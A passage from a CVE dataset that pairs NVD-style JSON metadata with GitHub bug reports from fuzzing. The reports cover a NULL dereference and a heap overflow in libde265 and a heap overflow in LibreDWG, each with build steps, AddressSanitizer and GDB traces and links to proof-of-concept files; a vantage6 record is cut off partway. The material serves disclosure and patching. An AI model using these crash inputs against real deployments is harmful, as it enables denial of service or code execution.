WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3499875==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555570c79d bp 0x7ffffffe28e0 sp 0x7ffffffe24f0 T0)
==3499875==The signal is caused by a WRITE memory access.
==3499875==Hint: address points to the zero page.
#0 0x55555570c79c in _mm_storel_epi64(long long __vector(2)*, long long __vector(2)) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
#1 0x55555570c79c in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int) /home/fuzz/libde265/libde265/x86/sse-motion.cc:254
#2 0x5555557b9c19 in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const ../libde265/acceleration.h:249
#3 0x5555557a1a6a in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:544
#4 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#5 0x5555556848c0 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4314
#6 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#7 0x555555689940 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4635
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733 in _mm_storel_epi64(long long __vector(2)*, long long __vector(2))
==3499875==ABORTING
```
# POC
[poc_segv06.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv06.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv06.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
0x000055555570c79d in _mm_storel_epi64(long long __vector(2)*, long long __vector(2)) (__B=..., __P=0x0) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
733 *(__m64_u *)__P = (__m64) ((__v2di)__B)[0];
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x000055555570c787 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+109 je 0x55555570c796 <ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int)+2984>
0x000055555570c789 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+111 mov $0x8,%esi
0x000055555570c78e _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+116 mov %rdx,%rdi
0x000055555570c791 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+119 callq 0x555555571040 <__asan_report_store_n@plt>
0x000055555570c796 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+124 mov -0x358(%rbp),%rdx
0x000055555570c79d _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+131 mov %r8,(%rdx)
0x000055555570c7a0 _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+134 nop
~
~
~
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed40 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000007 rdi 0x0000000000000000 rbp 0x00007ffffffe2890 rsp 0x00007ffffffe24a0
r8 0x0000000000000000 r9 0x0000000000000000 r10 0x0000000000000040 r11 0x0000000000000040 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc550 r15 0x00007ffffffe2a80
rip 0x000055555570c79d eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
728 }
729
730 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
731 _mm_storel_epi64 (__m128i_u *__P, __m128i __B)
732 {
733 *(__m64_u *)__P = (__m64) ((__v2di)__B)[0];
734 }
735
736 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
737 _mm_storeu_si64 (void *__P, __m128i __B)
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x000055555570c79d in _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+131 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
[1] from 0x000055555570c79d in ff_hevc_put_weighted_pred_avg_8_sse(unsigned char*, long, short const*, short const*, long, int, int)+2991 at sse-motion.cc:254
[2] from 0x00005555557b9c1a in acceleration_functions::put_weighted_pred_avg(void*, long, short const*, short const*, long, int, int, int) const+282 at ../libde265/acceleration.h:249
[3] from 0x00005555557a1a6b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+18639 at motion.cc:544
[4] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[5] from 0x00005555556848c1 in read_coding_unit(thread_context*, int, int, int, int)+2148 at slice.cc:4314
[6] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[7] from 0x0000555555689941 in read_coding_quadtree(thread_context*, int, int, int, int)+2634 at slice.cc:4635
[8] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[9] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3508110 name dec265 from 0x000055555570c79d in _mm_storel_epi64(long long __vector(2)*, long long __vector(2))+131 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:733
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __B = {[0] = 0, [1] = 0}, __P = 0x0: Cannot access memory at address 0x0
loc x = 0, y = 0, dst = 0x0: Cannot access memory at address 0x0, r0 = {[0] = 0, [1] = 0}, r1 = {[0] = 0, [1] = 0}, f0 = {[0] = 18014673391583296, [1] = 18014673391583296}, r2 = {[0] = 0, [1] = 0}, r3 = {[0] = 0, [1] = 0}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:254 | https://api.github.com/repos/strukturag/libde265/issues/383/comments | 2 | 2023-01-29T08:15:05Z | 2023-03-04T07:42:17Z | https://github.com/strukturag/libde265/issues/383 | 1,561,180,747 | 383 | 4,782 |
CVE-2023-25221 | 2023-03-01T15:15:11.803 | Libde265 v1.0.10 was discovered to contain a heap-buffer-overflow vulnerability in the derive_spatial_luma_vector_prediction function in motion.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/388"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/388"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/strukturag/libde265/issues/388 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
heap-buffer-overflow in function derive_spatial_luma_vector_prediction at motion.cc:1894
# Version
```
git log
commit bfb6de155f9fb015d2904cb4ef07809f17995276 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sun Jan 29 12:20:48 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_hbo01.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: maximum number of reference pictures exceeded
WARNING: CTB outside of image area (concealing stream error...)
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: non-existing reference picture accessed
WARNING: Too many warnings queued
=================================================================
==3163634==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000ae1c at pc 0x5555557b561f bp 0x7ffffffee780 sp 0x7ffffffee770
READ of size 1 at 0x61b00000ae1c thread T0
#0 0x5555557b561e in derive_spatial_luma_vector_prediction(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, int, int, int, unsigned char*, MotionVector*) /home/fuzz/libde265/libde265/motion.cc:1894
#1 0x5555557b708b in fill_luma_motion_vector_predictors(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, int, int, int, MotionVector*) /home/fuzz/libde265/libde265/motion.cc:1960
#2 0x5555557b82d3 in luma_motion_vector_prediction(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2033
#3 0x5555557b92d3 in motion_vectors_and_ref_indices(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int, PBMotion*) /home/fuzz/libde265/libde265/motion.cc:2119
#4 0x5555557b982d in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2157
#5 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#6 0x5555556878c1 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4497
#7 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
0x61b00000ae1c is located 20 bytes to the right of 1416-byte region [0x61b00000a880,0x61b00000ae08)
allocated by thread T0 here:
#0 0x7ffff7692587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104
#1 0x55555558858e in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:633
#2 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#3 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#4 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#5 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#6 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/libde265/libde265/motion.cc:1894 in derive_spatial_luma_vector_prediction(base_context*, de265_image*, slice_segment_header const*, int, int, int, int, int, int, int, int, int, int, unsigned char*, MotionVector*)
Shadow bytes around the buggy address:
0x0c367fff9570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff95a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff95b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fff95c0: 00 fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff95d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff95e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fff95f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fff9610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3163634==ABORTING
```
# POC
[poc_hbo01.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_hbo01.bin)
# Impact
This vulnerability is capable of crashing software, bypass protection mechanism, modify of memory, and successful exploitation may lead to code execution.
| heap-buffer-overflow in function derive_spatial_luma_vector_prediction at motion.cc:1894 | https://api.github.com/repos/strukturag/libde265/issues/388/comments | 2 | 2023-01-30T00:57:44Z | 2023-03-04T07:42:32Z | https://github.com/strukturag/libde265/issues/388 | 1,561,547,743 | 388 | 4,783 |
CVE-2023-25222 | 2023-03-01T15:15:11.860 | A heap-based buffer overflow vulnerability exits in GNU LibreDWG v0.12.5 via the bit_read_RC function at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/615"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/615"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/LibreDWG/libredwg/issues/615 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | # Description
heap-buffer-overflow in function bit_read_RC at bits.c:320
# Version
```
git log
commit 3c90dc6641e11e486666940d7f354d2df54503d6 (HEAD -> master, tag: 0.12.5.5010, origin/master, origin/HEAD)
Author: Michal Josef Špaček <michal.josef.spacek@gmail.com>
Date: Fri Jan 27 18:50:08 2023 +0100
```
# Steps to reproduce
```
apt install jing libjaxp1.3-java libbatik-java libavalon-framework-java
git clone https://github.com/LibreDWG/libredwg.git
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
cd libredwg
sh ./autogen.sh
./configure --enable-release --enable-trace --disable-shared
make -j
```
```
cd programs
./dwg2dxf -b -m ./poc_hbo01.bin -o /dev/null
Reading DWG file ./poc_hbo01.bin
=================================================================
==3322912==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61700000007f at pc 0x0000004f4ebf bp 0x7fffffffaca0 sp 0x7fffffffac98
READ of size 1 at 0x61700000007f thread T0
#0 0x4f4ebe in bit_read_RC /home/fuzz/libredwg/src/bits.c:320:10
#1 0x4f5b15 in bit_read_RS /home/fuzz/libredwg/src/bits.c:380:11
#2 0x4f6155 in bit_read_RL /home/fuzz/libredwg/src/bits.c:443:11
#3 0x51d38f in decode_R13_R2000 /home/fuzz/libredwg/src/decode.c:682:9
#4 0x515806 in dwg_decode /home/fuzz/libredwg/src/decode.c:225:38
#5 0x4ce9c3 in dwg_read_file /home/fuzz/libredwg/src/dwg.c:255:11
#6 0x4cb903 in main /home/fuzz/libredwg/programs/dwg2dxf.c:258:15
#7 0x7ffff7c49082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#8 0x41d4bd in _start (/home/fuzz/libredwg/programs/dwg2dxf+0x41d4bd)
0x61700000007f is located 1 bytes to the left of 652-byte region [0x617000000080,0x61700000030c)
allocated by thread T0 here:
#0 0x498892 in calloc (/home/fuzz/libredwg/programs/dwg2dxf+0x498892)
#1 0x4ccfc7 in dat_read_file /home/fuzz/libredwg/src/dwg.c:91:33
#2 0x4ce911 in dwg_read_file /home/fuzz/libredwg/src/dwg.c:248:15
#3 0x4cb903 in main /home/fuzz/libredwg/programs/dwg2dxf.c:258:15
#4 0x7ffff7c49082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/libredwg/src/bits.c:320:10 in bit_read_RC
Shadow bytes around the buggy address:
0x0c2e7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2e7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c2e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3322912==ABORTING
```
# POC
[poc_hbo01.bin](https://github.com/JieyongMa/poc/raw/main/libredwg/poc_hbo01.bin)
# Impact
This vulnerability is capable of crashing software, bypass protection mechanism, modify of memory, and successful exploitation may lead to code execution.
| heap-buffer-overflow in function bit_read_RC at bits.c:320 | https://api.github.com/repos/LibreDWG/libredwg/issues/615/comments | 1 | 2023-01-30T08:00:12Z | 2023-04-29T20:50:44Z | https://github.com/LibreDWG/libredwg/issues/615 | 1,561,928,009 | 615 | 4,784 |
CVE-2022-39228 | 2023-03-01T17:15:10.980 | vantage6 is a privacy preserving federated learning infrastructure for secure insight exchange. vantage6 does not inform the user of wrong username/password combination if the username actually exists. This is an attempt to prevent bots from obtaining usernames. However, if a wrong password is entered a number of times, the user account is blocked temporarily. This issue has been fixed in version 3.8.0.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/vantage6/vantage6/commit/ab4381c35d24add06f75d5a8a284321f7a340bd2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/vantage6/vantage6/issues/59"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/vantage6/vantage6/pull/281"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-36gx-9q6h-g429"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/vantage6/vantage6/commit/ab4381c35d24add06f75d5a8a284321f7a340bd2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/vantage6/vantage6/issues/59"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/vantage6/vantage6/pull/281"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-36gx-9q6h-g429"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vantage6:vantage6:*:*:*:*:*:*:*:*",
